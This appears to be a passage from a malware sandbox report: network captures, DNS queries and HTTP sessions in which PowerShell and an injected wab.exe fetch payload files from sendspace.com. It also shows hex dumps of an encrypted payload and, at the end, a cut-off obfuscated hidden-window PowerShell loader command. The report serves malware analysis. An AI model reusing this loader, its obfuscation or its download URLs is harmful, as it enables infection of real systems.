                                                                                 May 23, 2024 20:12:43.473957062 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.473979950 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.473995924 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.476593018 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.476613045 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.476664066 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.476669073 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.476706982 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.521541119 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.521562099 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.521667004 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.521671057 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.521714926 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.525654078 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.525722027 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.525727987 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.525759935 CEST  443          49705      69.31.136.17   192.168.2.5
                                                                                 May 23, 2024 20:12:43.525772095 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.525804043 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:12:43.526077986 CEST  49705        443        192.168.2.5    69.31.136.17
                                                                                 May 23, 2024 20:13:15.796199083 CEST  49713        443        192.168.2.5    104.21.28.80
                                                                                 May 23, 2024 20:13:15.796295881 CEST  443          49713      104.21.28.80   192.168.2.5
                                                                                 May 23, 2024 20:13:15.796387911 CEST  49713        443        192.168.2.5    104.21.28.80
                                                                                 May 23, 2024 20:13:15.804913044 CEST  49713        443        192.168.2.5    104.21.28.80
                                                                                 May 23, 2024 20:13:15.804949045 CEST  443          49713      104.21.28.80   192.168.2.5
                                                                                 May 23, 2024 20:13:16.290924072 CEST  443          49713      104.21.28.80   192.168.2.5
                                                                                 May 23, 2024 20:13:16.291017056 CEST  49713        443        192.168.2.5    104.21.28.80
                                                                                 May 23, 2024 20:13:16.343144894 CEST  49713        443        192.168.2.5    104.21.28.80
                                                                                 May 23, 2024 20:13:16.343193054 CEST  443          49713      104.21.28.80   192.168.2.5
                                                                                 May 23, 2024 20:13:16.343386889 CEST  443          49713      104.21.28.80   192.168.2.5
                                                                                 May 23, 2024 20:13:16.343441010 CEST  49713        443        192.168.2.5    104.21.28.80
                                                                                 May 23, 2024 20:13:16.345823050 CEST  49713        443        192.168.2.5    104.21.28.80
                                                                                 May 23, 2024 20:13:16.390487909 CEST  443          49713      104.21.28.80   192.168.2.5
                                                                                 May 23, 2024 20:13:16.747569084 CEST  443          49713      104.21.28.80   192.168.2.5
                                                                                 May 23, 2024 20:13:16.747621059 CEST  443          49713      104.21.28.80   192.168.2.5
                                                                                 May 23, 2024 20:13:16.747889042 CEST  49713        443        192.168.2.5    104.21.28.80
                                                                                 May 23, 2024 20:13:16.766366959 CEST  49713        443        192.168.2.5    104.21.28.80
                                                                                 May 23, 2024 20:13:16.766402960 CEST  443          49713      104.21.28.80   192.168.2.5
                                                                                 May 23, 2024 20:13:16.808975935 CEST  49714        443        192.168.2.5    69.31.136.57
                                                                                 May 23, 2024 20:13:16.809017897 CEST  443          49714      69.31.136.57   192.168.2.5
                                                                                 May 23, 2024 20:13:16.809154987 CEST  49714        443        192.168.2.5    69.31.136.57
                                                                                 May 23, 2024 20:13:16.809953928 CEST  49714        443        192.168.2.5    69.31.136.57
                                                                                 May 23, 2024 20:13:16.809982061 CEST  443          49714      69.31.136.57   192.168.2.5
                                                                                 May 23, 2024 20:13:17.496309042 CEST  443          49714      69.31.136.57   192.168.2.5
                                                                                 May 23, 2024 20:13:17.496417046 CEST  49714        443        192.168.2.5    69.31.136.57
                                                                                 May 23, 2024 20:13:17.499886990 CEST  49714        443        192.168.2.5    69.31.136.57
                                                                                 May 23, 2024 20:13:17.499917984 CEST  443          49714      69.31.136.57   192.168.2.5
                                                                                 May 23, 2024 20:13:17.500144005 CEST  443          49714      69.31.136.57   192.168.2.5
                                                                                 May 23, 2024 20:13:17.500207901 CEST  49714        443        192.168.2.5    69.31.136.57
                                                                                 May 23, 2024 20:13:17.512250900 CEST  49714        443        192.168.2.5    69.31.136.57
                                                                                May 23, 2024 20:13:17.558496952 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.180078030 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.180109024 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.180124044 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.180196047 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.180196047 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.180272102 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.180347919 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.212168932 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.212202072 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.212281942 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.212281942 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.212321997 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.212430000 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.271936893 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.271959066 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.272100925 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.272169113 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.272241116 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.301114082 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.301136017 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.301373005 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.301438093 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.301512957 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.316589117 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.316605091 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.316680908 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.316695929 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.316751003 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.332607985 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.332680941 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.332684994 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.332739115 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.333316088 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.333353996 CEST4434971469.31.136.57192.168.2.5
                                                                                May 23, 2024 20:13:18.333379984 CEST49714443192.168.2.569.31.136.57
                                                                                May 23, 2024 20:13:18.333414078 CEST49714443192.168.2.569.31.136.57
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 23, 2024 20:12:41.252665043 CEST | 62047 | 53 | 192.168.2.5 | 1.1.1.1
May 23, 2024 20:12:41.264358997 CEST | 53 | 62047 | 1.1.1.1 | 192.168.2.5
May 23, 2024 20:12:42.077711105 CEST | 50888 | 53 | 192.168.2.5 | 1.1.1.1
May 23, 2024 20:12:42.171715021 CEST | 53 | 50888 | 1.1.1.1 | 192.168.2.5
May 23, 2024 20:13:16.778476954 CEST | 55060 | 53 | 192.168.2.5 | 1.1.1.1
May 23, 2024 20:13:16.807218075 CEST | 53 | 55060 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 23, 2024 20:12:41.252665043 CEST | 192.168.2.5 | 1.1.1.1 | 0xeccb | Standard query (0) | www.sendspace.com | A (IP address) | IN (0x0001) | false
May 23, 2024 20:12:42.077711105 CEST | 192.168.2.5 | 1.1.1.1 | 0xa3b0 | Standard query (0) | fs03n4.sendspace.com | A (IP address) | IN (0x0001) | false
May 23, 2024 20:13:16.778476954 CEST | 192.168.2.5 | 1.1.1.1 | 0xcd0d | Standard query (0) | fs13n1.sendspace.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 23, 2024 20:12:41.264358997 CEST | 1.1.1.1 | 192.168.2.5 | 0xeccb | No error (0) | www.sendspace.com | (none) | 104.21.28.80 | A (IP address) | IN (0x0001) | false
May 23, 2024 20:12:41.264358997 CEST | 1.1.1.1 | 192.168.2.5 | 0xeccb | No error (0) | www.sendspace.com | (none) | 172.67.170.105 | A (IP address) | IN (0x0001) | false
May 23, 2024 20:12:42.171715021 CEST | 1.1.1.1 | 192.168.2.5 | 0xa3b0 | No error (0) | fs03n4.sendspace.com | (none) | 69.31.136.17 | A (IP address) | IN (0x0001) | false
May 23, 2024 20:13:16.807218075 CEST | 1.1.1.1 | 192.168.2.5 | 0xcd0d | No error (0) | fs13n1.sendspace.com | (none) | 69.31.136.57 | A (IP address) | IN (0x0001) | false
                                                                                • www.sendspace.com
                                                                                • fs03n4.sendspace.com
                                                                                • fs13n1.sendspace.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 104.21.28.80 | 443 | 1716 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-23 18:12:41 UTC | 174 | OUT | GET /pro/dl/i41a76 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: www.sendspace.com
Connection: Keep-Alive
2024-05-23 18:12:42 UTC | 946 | IN | HTTP/1.1 301 Moved Permanently
Date: Thu, 23 May 2024 18:12:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: SID=ros36t9d28mng0p8summt2q6r1; path=/; domain=.sendspace.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: https://fs03n4.sendspace.com/dlpro/81d69660376a5bce96e9e379357cd531/664f8719/i41a76/Semicylinder.psm
Vary: Accept-Encoding
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wc1S25QabLwOC8tWcMSuw4EEnMJo%2BtIIyQtPrSM%2BEfyR5q2rPZRL%2FxtJyX0CWTD5qC3OhdQ4eNqO88FOYqpQgw75e2GMHI07olaoL3BL%2BsCdm178oE8jU4z4gmbAgZ3OQmz%2FvQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 888704021fed3314-EWR
alt-svc: h3=":443"; ma=86400
2024-05-23 18:12:42 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 69.31.136.17 | 443 | 1716 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-23 18:12:42 UTC | 235 | OUT | GET /dlpro/81d69660376a5bce96e9e379357cd531/664f8719/i41a76/Semicylinder.psm HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: fs03n4.sendspace.com
Connection: Keep-Alive
2024-05-23 18:12:43 UTC | 501 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 23 May 2024 18:12:42 GMT
Content-Type: application/octet-stream
Content-Length: 465356
Last-Modified: Wed, 22 May 2024 18:52:50 GMT
Connection: close
Set-Cookie: SID=fld9ac4eee7j84balm4926qe11; path=/; domain=.sendspace.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Disposition: attachment;filename="Semicylinder.psm"
ETag: "664e3f02-719cc"
Accept-Ranges: bytes


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.549713104.21.28.804431272C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-05-23 18:13:16 UTC175OUTGET /pro/dl/12acii HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                Host: www.sendspace.com
                                                                                Cache-Control: no-cache
                                                                                2024-05-23 18:13:16 UTC944INHTTP/1.1 301 Moved Permanently
                                                                                Date: Thu, 23 May 2024 18:13:16 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Set-Cookie: SID=3n1k50ohec2v6n8nvd1o04nn84; path=/; domain=.sendspace.com
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                Pragma: no-cache
                                                                                Location: https://fs13n1.sendspace.com/dlpro/a249fc130e1351275114f8d6a64c794e/664f873c/12acii/aLnQbzJIDX45.bin
                                                                                Vary: Accept-Encoding
                                                                                CF-Cache-Status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WxPV4sQnCPDX9vveTQJAXHa3z9FATng3NF0BXGbXRwz3rV%2BLoBboTK3R%2FAJTf3nBEXEu%2Bt6Fq2e8VGaa5lVqNLFRXNBVzJK0QaglzbhEv6Gc%2FkSwomVPPzMf3gMvmV5Qo9rChw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 888704d9af6d43cb-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                2024-05-23 18:13:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                3 | 192.168.2.5 | 49714 | 69.31.136.57 | 443 | 1272 | C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-05-23 18:13:17 UTC | 300 | OUT | GET /dlpro/a249fc130e1351275114f8d6a64c794e/664f873c/12acii/aLnQbzJIDX45.bin HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                Cache-Control: no-cache
                                                                                Host: fs13n1.sendspace.com
                                                                                Connection: Keep-Alive
                                                                                Cookie: SID=3n1k50ohec2v6n8nvd1o04nn84
                                                                                2024-05-23 18:13:18 UTC | 425 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Thu, 23 May 2024 18:13:17 GMT
                                                                                Content-Type: application/octet-stream
                                                                                Content-Length: 87616
                                                                                Last-Modified: Wed, 22 May 2024 18:51:30 GMT
                                                                                Connection: close
                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                Content-Disposition: attachment;filename="aLnQbzJIDX45.bin"
                                                                                ETag: "664e3eb2-15640"
                                                                                Accept-Ranges: bytes
                                                                                2024-05-23 18:13:18 UTC15959INData Raw: 2a 86 84 0c 4a f6 f3 dc 77 95 cd 99 7d df 3c 1d c4 51 30 53 ba 1a e7 cc 31 45 7b b5 e7 b9 c2 d3 55 99 ed 70 0f df e7 9d ab 6b 4f 25 ab 4c 52 51 3a f4 e1 98 d1 ca f8 92 fb 68 02 40 bf 77 33 ba bf 3d eb f4 01 be 84 8c ff d0 66 3f e1 d4 9d fc 4d 5a a8 de fc 31 61 a0 87 9b 6d 18 17 42 02 ec 5e bd 6a 8b d6 d5 54 a2 98 1c a6 df 66 3d 05 b6 37 77 35 55 f3 bc 06 a2 db 34 52 04 5f d0 df c6 a3 75 52 5f 56 c7 98 6e d1 46 78 37 9a e4 bf 17 b0 b8 ee 28 a9 18 bf 4d 7c 96 c8 19 67 50 ab ea 31 49 f6 a0 da 81 9e f8 78 80 1c 13 14 9d b2 20 3b f2 e2 23 da 56 3e e5 10 ae 8f 44 c5 eb 8b 18 02 04 4e 76 40 8d 41 a1 67 1d 4b fa 00 dd 32 e8 80 dc 49 af 07 42 df c8 a2 45 d6 d2 96 b4 74 6c c0 1a de cf 5b 90 77 fa b4 bf d0 cb 6e d1 92 7b 5d b1 c3 cd d5 22 eb 6f 65 7c e0 4c c0 00 81
                                                                                Data Ascii: *Jw}<Q0S1E{UpkO%LRQ:h@w3=f?MZ1amB^jTf=7w5U4R_uR_VnFx7(M|gP1Ix ;#V>DNv@AgK2IBEtl[wn{]"oe|L
                                                                                2024-05-23 18:13:18 UTC16384INData Raw: ba cd a4 d3 b7 4e 9c b5 8c 9b 9e d6 67 e0 e8 03 37 cd 51 29 c4 b1 d6 50 5f 8f cb 91 9e 83 aa 79 22 8a bb 10 2f 4a 22 79 8e 32 4d c6 80 54 f4 8d 10 80 0a 56 32 09 4f e6 5c 64 26 1f 95 ec f3 d1 33 0d d1 dd 40 70 77 b8 8d cd f1 a1 90 bd a1 fd 27 78 1f 26 fb 51 c1 1f 00 f8 90 d6 07 77 42 88 0b 37 e2 9e 73 52 6e 8c 0f e5 39 8a 11 89 60 2e 18 14 62 a2 ba ad 46 7d 70 a3 b6 9c 97 a9 3a 9a 68 d5 90 a4 86 b0 53 59 ed 72 32 2b 6b 16 1f 8b eb c7 17 bd f8 4f b9 e8 aa de b3 ea d9 c7 5a c9 41 4f 21 8a 83 6b f8 86 ab 6a 99 5c a8 df b9 1f d6 82 2a f5 4f 40 1b e3 b7 47 6d 25 97 62 d2 c8 21 80 79 17 9e f5 41 7c ff b1 97 98 d3 01 3c ea 48 b8 e0 08 b0 82 ad 2d fb 49 62 2f f1 3f 1c d5 3d 4e a1 a8 d6 4f 95 80 5d 35 31 48 12 e6 8b 3c a3 40 83 4b 61 28 2d c1 09 0a 12 9c e4 1f 52
                                                                                Data Ascii: Ng7Q)P_y"/J"y2MTV2O\d&3@pw'x&QwB7sRn9`.bF}p:hSYr2+kOZAO!kj\*O@Gm%b!yA|<H-Ib/?=NO]51H<@Ka(-R
                                                                                2024-05-23 18:13:18 UTC16384INData Raw: a3 cd 05 79 9a 21 fa 23 e4 64 f4 6d 90 dd 2d 7a 63 ad 43 46 5d 9e 1c 41 45 88 06 92 a1 45 6b 9b c5 f4 36 40 14 d2 89 e6 e5 56 16 0b f1 17 da a1 0c 34 d2 4f 05 82 ab 4f 72 48 7e 93 c3 de 86 c8 73 b8 98 af dd d1 1e 8b 7b 98 30 b2 ff 7b 43 a9 65 fb 36 e0 00 7d d4 1f 82 d6 91 df 5a 46 bc c0 c7 46 53 0b c6 b5 a8 aa 48 92 17 80 ce 83 d1 f6 a3 99 11 58 f2 22 f8 87 ae 77 74 6e 34 9c f7 5b 85 ce 9d 5f b6 50 ab ac c8 e0 95 78 3a 2d 72 be 7e 38 37 c1 e0 03 52 23 67 1e 05 8a 5e e4 e9 94 6b 4b 0d d7 d5 14 57 43 8f 13 07 1f 2a d4 78 2d f1 90 5e 30 06 76 b0 32 82 6e 57 ca f7 24 84 b7 9d 02 f4 fa f5 7a da 31 c4 28 24 fb c7 0e 53 76 1f 84 db bd 2f d6 56 5c 61 21 37 7c 3b ff 75 d7 5f 34 1c 7c 76 26 cb d3 75 fd 44 0f eb 39 9d 9c 67 72 80 14 d2 9b 6d be 84 8c fb 97 0c 4b 5d
                                                                                Data Ascii: y!#dm-zcCF]AEEk6@V4OOrH~s{0{Ce6}ZFFSHX"wtn4[_Px:-r~87R#g^kKWC*x-^0v2nW$z1($Sv/V\a!7|;u_4|v&uD9grmK]
                                                                                2024-05-23 18:13:18 UTC16384INData Raw: 42 41 e1 fe ab 0c 41 0b f5 91 ac e8 a3 0c 3b b6 2f 1c fb 92 7b 1c 38 b2 76 9f 43 3d 1a e5 7a 80 de cd 44 cc 45 d4 5a fc 26 e2 6e 0b d7 95 69 be 23 dd 56 e5 fc 3d 7f 4d 50 45 ba d3 12 69 79 0b f3 5a 18 62 24 74 0e c8 0d 8a 80 6b bc f8 f8 ed 6e 83 5e d5 f6 ce da 48 35 b9 35 85 c9 9c a7 b3 55 52 68 1f 9f 66 f6 53 7b 80 71 fb 1f 16 f7 e4 f9 78 d0 e6 65 ae e9 50 0c 42 ce 1c fd 04 63 ee e4 76 dd 95 82 c2 17 92 ec db 70 b5 f3 49 2f d1 e2 d3 68 ae 70 c7 b1 b1 1b 0a 49 51 97 2c c3 82 53 e1 6f 86 b6 56 98 cc 8b 21 f8 19 6b 8f fc 22 5e e7 c3 02 10 ef ee 2a fe 30 6e 1f 33 c1 f4 93 f1 01 b0 10 6e 3a c6 77 2b 46 85 ac de 98 9b 3b ba d6 02 12 2a 0e d2 ed f3 9e 2f e7 9e f8 ff fc 6d 2b 41 df c5 05 bd fa cb 31 29 b2 2f b2 17 9a b5 8c 15 a5 7f 59 09 aa 19 22 da d6 b8 5e c0
                                                                                Data Ascii: BAA;/{8vC=zDEZ&ni#V=MPEiyZb$tkn^H55URhfS{qxePBcvpI/hpIQ,SoV!k"^*0n3n:w+F;*/m+A1)/Y"^
                                                                                2024-05-23 18:13:18 UTC16384INData Raw: f6 84 8c fb d0 e8 3f 4c 37 92 fe b3 5a e2 fa fc 31 61 a0 41 9b 95 0b 02 40 45 ec 01 99 6a 8b d6 d5 d2 a2 5a 1c bc dd 2e 3d e5 fe 37 77 35 55 75 bc b0 a2 c4 36 1b 04 d7 98 df c6 19 65 d4 51 9c 60 b2 a1 b9 fe 49 31 57 c5 2f 87 62 d0 85 42 ae 6a 84 22 6f c0 a9 74 47 3d 58 99 f7 7f bf c7 b3 f3 2f dc 58 f5 72 77 f7 ef 35 61 63 9e 9b 11 52 78 1a d2 10 ae 09 44 e9 e8 bd 1a 48 04 d4 52 40 8d 41 a1 e1 1d 67 f9 3c df 7e e8 f4 97 49 af 07 42 59 c8 35 53 94 d0 d8 b4 b8 27 c0 1a de cf dd 90 1c fc f6 bd 9f cb 76 9d 92 7b 5d b1 45 cd ed 3b 37 6e 35 7c 50 68 c0 00 81 7c 75 8e 72 8d 67 ad c0 50 5d ce 4d 4e 67 37 d3 21 c0 73 61 06 0a 33 08 1a cb 07 37 95 fe 7e 04 32 94 3a 05 b2 0f 15 98 1e af 92 38 31 7b eb 29 bc 57 86 78 5f 6f 06 60 60 0c 78 b0 7b 7f cf 4c ba 24 da c6 67
                                                                                Data Ascii: ?L7Z1aA@EjZ.=7w5Uu6eQ`I1W/bBj"otG=X/Xrw5acRxDHR@Ag<~IBY5S'v{]E;7n5|Ph|urgP]MNg7!sa37~2:81{)Wx_o``x{L$g
                                                                                2024-05-23 18:13:18 UTC6121INData Raw: ad 7a 22 bf a4 a8 5d 95 57 2f ab 3e a0 c2 d3 11 d9 4a 7d 84 ab f3 07 62 52 bb e4 57 03 9d f4 70 45 01 64 98 74 0e 61 37 fe ce 9b 68 27 71 f4 39 cb 89 69 e5 db 82 a7 9c 7e d7 3c 28 90 ee ae 4e 7d 84 36 54 c7 3f 41 8a 36 cf 7f 5d 5c bf 37 58 8d ef c7 e3 19 b1 7d 02 1f 7d ef de 59 1c f8 1a 00 46 40 41 de a3 d0 8f ec 5e 74 d3 d8 ae 33 99 95 cf 4a 49 b1 79 bd ff e5 71 5c 64 43 8d ab 05 97 39 b7 4e 91 d9 db 4a b1 24 1f 4a 21 39 2e 60 a1 1e 9e 83 65 08 01 6b 12 1e 8e 42 52 94 d7 fe a9 f7 50 aa 23 d2 d7 b7 73 28 ef 2b 88 35 24 70 aa 64 b6 9e 70 13 17 7d 5c 37 d6 3f 6b 1c a3 db 40 6d f8 3a b1 79 56 2d b2 a9 32 ef b6 74 ac 34 a1 20 c6 e1 36 15 80 2e 54 20 69 a9 07 6d 85 57 78 c9 4d bf a4 cc 43 00 63 da 08 3f b8 d0 e7 1f 31 ee 73 fb 03 2e b9 2b 60 4f e3 ea 6c 6d 5a
                                                                                Data Ascii: z"]W/>J}bRWpEdta7h'q9i~<(N}6T?A6]\7X}}YF@A^t3JIyq\dC9NJ$J!9.`ekBRP#s(+5$pdp}\7?k@m:yV-2t4 6.T imWxMCc?1s.+`OlmZ


                                                                                Target ID:0
                                                                                Start time:14:12:37
                                                                                Start date:23/05/2024
                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\kam.cmd" "
                                                                                Imagebase:0x7ff6b14d0000
                                                                                File size:289'792 bytes
                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:1
                                                                                Start time:14:12:37
                                                                                Start date:23/05/2024
                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                Imagebase:0x7ff6d64d0000
                                                                                File size:862'208 bytes
                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:2
                                                                                Start time:14:12:37
                                                                                Start date:23/05/2024
                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:powershell.exe -windowstyle hidden "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. 
